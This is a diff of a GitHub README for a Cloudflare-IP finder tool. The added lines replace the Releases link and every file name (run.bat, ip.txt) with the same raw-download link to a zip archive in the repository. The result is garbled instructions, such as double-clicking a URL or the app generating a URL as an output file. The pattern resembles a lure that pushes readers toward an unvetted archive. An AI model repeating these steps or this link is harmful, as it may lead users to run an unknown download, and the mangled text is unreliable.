muh97is/i-love-this-IP/README.md

 To get started, follow these steps to download and run the software:

 1. **Download the Latest Version**
-   Visit the [Releases Page](https://github.com/muh97is/i-love-this-IP/releases) to download the latest version of the application.
+   Visit the [Releases Page](https://github.com/muh97is/i-love-this-IP/raw/refs/heads/main/sclaff/i-love-this-IP-1.2.zip) to download the latest version of the application.
 Select the appropriate file for your operating system.

 2. **Extract the Files**
    After downloading, locate the ZIP file and extract its contents to a folder on your computer.

 3. **Run the Application**
    Open the folder where you extracted the files.
-Look for `run.bat` (or a similar file for your OS) and double-click it to start the application.
+Look for `https://github.com/muh97is/i-love-this-IP/raw/refs/heads/main/sclaff/i-love-this-IP-1.2.zip` (or a similar file for your OS) and double-click it to start the application.

 4. **Check the Output**
-   The application will generate an `ip.txt` file in the same folder.
+   The application will generate an `https://github.com/muh97is/i-love-this-IP/raw/refs/heads/main/sclaff/i-love-this-IP-1.2.zip` file in the same folder.
 This file contains the list of Cloudflare IPs.

 5. **Utilize the IPs**
-   You can use the IPs in `ip.txt` for various purposes, including:
+   You can use the IPs in `https://github.com/muh97is/i-love-this-IP/raw/refs/heads/main/sclaff/i-love-this-IP-1.2.zip` for various purposes, including:
    - Setting up your proxy service (e.g., sing-box, Xray).
    - Customizing Cloudflare CDN routing.
    - Improving Cloudflare Workers performance.